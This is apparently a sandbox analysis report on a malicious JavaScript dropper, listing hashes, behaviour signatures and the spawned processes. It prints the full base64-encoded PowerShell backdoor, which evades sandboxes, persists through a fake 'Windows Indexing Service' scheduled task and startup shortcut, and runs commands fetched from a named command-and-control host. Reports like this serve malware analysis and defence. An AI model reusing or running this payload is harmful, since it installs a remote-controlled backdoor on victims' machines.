Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/05/2024, 08:40

General

  • Target

    3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js

  • Size

    20KB

  • MD5

    3e9c6a8e6988adbb16ef8715c22cdd58

  • SHA1

    c959d76d0cbe839ed6325796b1b92e2a62f5e5a2

  • SHA256

    4f84400506a99ee8b0b7d0ea00fd66d5cb575e8bf768fc6bcdbee5592e310fca

  • SHA512

    1a688465a5161ba5e49db747b07ecffd3f6d42abaa4befd3eaa02755e2bf34c90a8dcf0ecb4054a270507706cdd86b17ed6bf1763406434588fab35c11e0aeb7

  • SSDEEP

    384:3wjKMDdC+3HjH1ciPOlHS4mLasODgZjNfqLhIdlWmpzOTkmIhkn73jbIYmYTc:3mKCDVu+msdFDdlfpzUkmRfbIh

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://wws.chasingredford.com/

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyBXaW4zMl9Db21wdXRlclN5c3RlbSAtUHJvcGVydHkgTW9kZWwpLk1vZGVsIC1tYXRjaCAiVmlydHVhbEJveHxWTXdhcmV8S1ZNIikpeyBleGl0O307CiR2Y2Z4YmFhZnhnID0gJXdvcmtfZGlyJTsKaWYgKC1ub3QgKFRlc3QtUGF0aCAkdmNmeGJhYWZ4ZykpIHsgbWQgJHZjZnhiYWFmeGc7IH0KJGJ2ZHlhdWYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UuanMiOwokYWV3ZGdjdnMgPSAkZW52OnRlbXAgKyAiXFhBRlg5MTEuMS50bXAiOwokaGN1ZWl2YnhkICA9IEpvaW4tUGF0aCAkdmNmeGJhYWZ4ZyAidGh1bWJjYWNoZV8zMy5kYiI7CiRkaXRqYnpoZXYgID0gOTExLjE7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRkYnl2YWlqID0gInciOwoKZnVuY3Rpb24gaWFtd29ya3sgc2MgLVBhdGggJGFld2RnY3ZzIC1WYWx1ZSAoICRwaWQsIFtzdHJpbmddKEdldC1EYXRlKSwgJGRpdGpiemhldiwgJG15dXJscG9zdCwgJGVzenl1emNlIC1qb2luICcsJyApOyB9OwpmdW5jdGlvbiBkY2d1dmV3aSggJGd4Y3lnZHVpdmUgKXsKICBpZiggJGd4Y3lnZHVpdmUgLW1hdGNoICdPdXRPZk1lbW9yeUV4Y2VwdGlvbicgKXsKICAgIHJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7CiAgICBnZXQtcHJvY2VzcyBwb3dlcnNoZWxsKiB8IHN0b3AtcHJvY2VzczsKICAgIGV4aXQ7CiAgfTsKfQoKZnVuY3Rpb24gc2VuZHBvc3QoICRneGN5Z2R1aXZlICl7CiAgaWYoICEkbXl1cmxwb3N0ICl7IHJldHVybiAkZmFsc2U7IH07CiAgJGN6aWRhaWNoID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsKICAkY3ppZGFpY2guQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJGN6aWRhaWNoLkhlYWRlcnMuQWRkKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7CiAgJGN6aWRhaWNoLkVuY29kaW5nID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGODsKICB0cnl7CiAgICAkemRjaGV4enh4YiA9ICRjemlkYWljaC5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGRpdGpiemhldiZndWlkPSRkanp6d3p2dmJpJiIgKyAkZ3hjeWdkdWl2ZSApICkgKSApOwogICAgJHpkY2hleHp4eGIgPSBbc3RyaW5nXVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCAkemRjaGV4enh4YiApICk7CiAgICBpZiggISRkYnl2YWlqICl7IHJldHVybiAkZmFsc2U7IH0KICAgIGlmKCAkZXN6eXV6Y2UgLWVxICR6ZGNoZXh6eHhiLlN1YnN0cmluZygwLDE2KSApewogICAgICByZXR1cm4gJHpkY2hleHp4eGIuU3Vic3RyaW5nKDE2LCR6ZGNoZXh6eHhiLmxlbmd0aC0xNikgOwogICAgfWVsc2V7CiAgICAgICRkYnl2YWlqID0gJGZhbHNlOwogICAgICBzZW5kcG9zdCAoImVycm9yPSIgKyBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggJHpkY2hleHp4eGIgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgZGNndXZld2kgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7CiAgICAkZGJ5dmFpaiA9ICRmYWxzZTsKICAgICRjemlkYWljaC5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGRpdGpiemhldiZndWlkPSRkanp6d3p2dmJpJmVycm9yPXNlbmRwb3N0OiIgKyAkbXl1cmxwb3N0KyI6IiskemRjaGV4enh4YiArIjoiKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApICkgKSApOwogIH07CiAgcmV0dXJuICRmYWxzZTsKfTsKCmZ1bmN0aW9uIGpjeWNnanUoICRneGN5Z2R1aXZlICl7CiAgJGNod2R2aXVmYSA9ICJodHRwOi8vd3dzLmNoYXNpbmdyZWRmb3JkLmNvbS8iOwogICJkZmIiLCI5M2EiLCIyNWMiLCI4ZjkiLCJnaDciIHwgJXsgJGNod2R2aXVmYSArPSAiLCIrImh0dHA6Ly8iKyAoIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICRfKyAkKEdldC1EYXRlIC1VRm9ybWF0ICIleSVtJVYiKSApICkudG9Mb3dlcigpICkgKyIudG9wLyI7IH07CiAgJGNod2R2aXVmYS5zcGxpdCgiLCIpIHwgJXsKICAgIGlmKCAhJG15dXJscG9zdCApewogICAgICAkbXl1cmxwb3N0ID0gJF87CiAgICAgIGlmKCAhKHNlbmRwb3N0ICgkZ3hjeWdkdWl2ZSArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIHJldHVybiAkbXl1cmxwb3N0Owp9OwoKaWYgKCBUZXN0LVBhdGggJGFld2RnY3ZzICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGFld2RnY3ZzICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHRyeXsgc3RvcC1wcm9jZXNzIC1pZCAoIChnYyAkYWV3ZGdjdnMpLnNwbGl0KCIsIilbMF0gKTsgfWNhdGNoe307CiAgICB0cnl7IHJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7IH1jYXRjaHt9OwogIH1lbHNlewogICAgZXhpdDsKICB9Owp9OwoKJGhjdHhlZHRkdXkgPSAib3M9Iitbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24rIiZwc3Zlcj0iKyggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3I7CmlmICggVGVzdC1QYXRoICRoY3VlaXZieGQgKXsKICAkZGp6end6dnZiaSwgJGVzenl1emNlID0gKGdldC1jb250ZW50ICRoY3VlaXZieGQpLnNwbGl0KCcsJyk7CiAgaWYoICggJGVzenl1emNlLmxlbmd0aCAtbmUgMTYgKSAtb3IgKCAkZGp6end6dnZiaS5sZW5ndGggLWx0IDIxICkgKXsKICAgIHJpIC1QYXRoICRoY3VlaXZieGQsJGFld2RnY3ZzIC1Gb3JjZTsKICAgIHRyeXsgZ2V0LXByb2Nlc3MgcG93ZXJzaGVsbCogfCBzdG9wLXByb2Nlc3MgfWNhdGNoe307CiAgICBleGl0OwogIH0KfWVsc2V7CiAgJGVzenl1emNlID0gKCBbZ3VpZF06Ok5ld0d1aWQoKSAtcmVwbGFjZSAnLScsJycgKS5TdWJzdHJpbmcoMCwxNik7CiAgc2MgLVBhdGggJGhjdWVpdmJ4ZCAtVmFsdWUgKCAoIChHZXQtV21pT2JqZWN0IC1jbGFzcyBXaW4zMl9Db21wdXRlclN5c3RlbSAtUHJvcGVydHkgTmFtZSkuTmFtZS50cmltKCkgKyAiXyIgKyBbZ3VpZF06Ok5ld0d1aWQoKS50b1N0cmluZygpLnJlcGxhY2UoJy0nLCAnJykuU3Vic3RyaW5nKDAsMjApICksICRlc3p5dXpjZSAgLWpvaW4gJywnICk7CiAgZ2kgJGhjdWVpdmJ4ZCAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgJGRqenp3enZ2YmksICRlc3p5dXpjZSA9IChnZXQtY29udGVudCAkaGN1ZWl2YnhkKS50cmltKCkuc3BsaXQoJywnKTsKICAkaGN0eGVkdGR1eSArPSAiJnNzaWQ9JGVzenl1emNlJiI7Cn0KdHJ5eyAKICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93c0luZGV4aW5nU2VydmljZSIgL2YgfWNhdGNoe30KICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICR0d2JqZ3V5d2ogPSAnd3NjcmlwdC5leGUgLy9ub2xvZ28gIicrJGJ2ZHlhdWYrJyIgPk5VTCAyPiYxJzsKICBzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NJbmRleGluZ1NlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDEwIC9kdSAyMzo1OSAvVFIgJHR3YmpndXl3ajsgCn1jYXRjaHt9OwoKdHJ5ewogICRqaHpjdmZ0ancgPSBbRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdTdGFydHVwJykgKyAnXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UubG5rJzsKICBpZiggLW5vdCAoIFRlc3QtUGF0aCAkamh6Y3ZmdGp3ICkgKXsKICAgICRodWFqdWR4eGdmID0gTmV3LU9iamVjdCAtQ29tT2JqZWN0ICgnV1NjcmlwdC5TaGVsbCcpOwogICAgJGh4eXl5aXcgPSAkaHVhanVkeHhnZi5DcmVhdGVTaG9ydGN1dCggJGpoemN2ZnRqdyAgKTsKICAgICRoeHl5eWl3LkFyZ3VtZW50cz0gJy8vbm9sb2dvICInKyRidmR5YXVmKyciID5OVUwgMj4mMSc7CiAgICAkaHh5eXlpdy5UYXJnZXRQYXRoID0gJ3dzY3JpcHQuZXhlJzsKICAgICRoeHl5eWl3LldvcmtpbmdEaXJlY3RvcnkgPSAkdmNmeGJhYWZ4ZzsKICAgICRoeHl5eWl3LldpbmRvd1N0eWxlID0gMTsKICAgICRoeHl5eWl3LkRlc2NyaXB0aW9uID0gJ1dpbmRvd3MgSW5kZXhpbmcgU2VydmljZSc7CiAgICAkaHh5eXlpdy5TYXZlKCk7CiAgfQp9Y2F0Y2h7fTsKCiRteXVybHBvc3QgPSBqY3ljZ2p1ICRoY3R4ZWR0ZHV5Owp3aGlsZSggJGRieXZhaWogKXsKICBpYW13b3JrOwogIHRyeXsKICAgIGlmKCAkZGJ5dmFpaiAtYW5kICgkZGJ5dmFpai5sZW5ndGggLWd0IDMwKSAgKXsKICAgICAgaWV4IC1Db21tYW5kICRkYnl2YWlqOwogICAgfTsKICB9Y2F0Y2h7CiAgICBkY2d1dmV3aSAkXy5FeGNlcHRpb24uTWVzc2FnZTsKICAgIHNlbmRwb3N0ICgiZXJyb3I9aWV4OiIgKyAkZGJ5dmFpaiArIjoiKyAkbXl1cmxwb3N0ICsiOiIgKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApOwogIH07CiAgU3RhcnQtU2xlZXAgLXMgMjgwOwogICRkYnl2YWlqID0gc2VuZHBvc3QgIiI7Cn07CnJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7Cg==' ) );iex $a;
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /TN WindowsIndexingService /f
        3⤵
          PID:500
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /TN "Windows Indexing Service" /f
          3⤵
            PID:2928
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"
            3⤵
            • Creates scheduled task(s)
            PID:4672

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jelxseaz.uj3.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2184-0-0x00007FF8010B3000-0x00007FF8010B5000-memory.dmp

        Filesize

        8KB

      • memory/2184-1-0x0000021E62390000-0x0000021E623B2000-memory.dmp

        Filesize

        136KB

      • memory/2184-11-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-12-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-13-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-14-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-16-0x00007FF8010B3000-0x00007FF8010B5000-memory.dmp

        Filesize

        8KB

      • memory/2184-17-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-18-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB

      • memory/2184-19-0x00007FF8010B0000-0x00007FF801B71000-memory.dmp

        Filesize

        10.8MB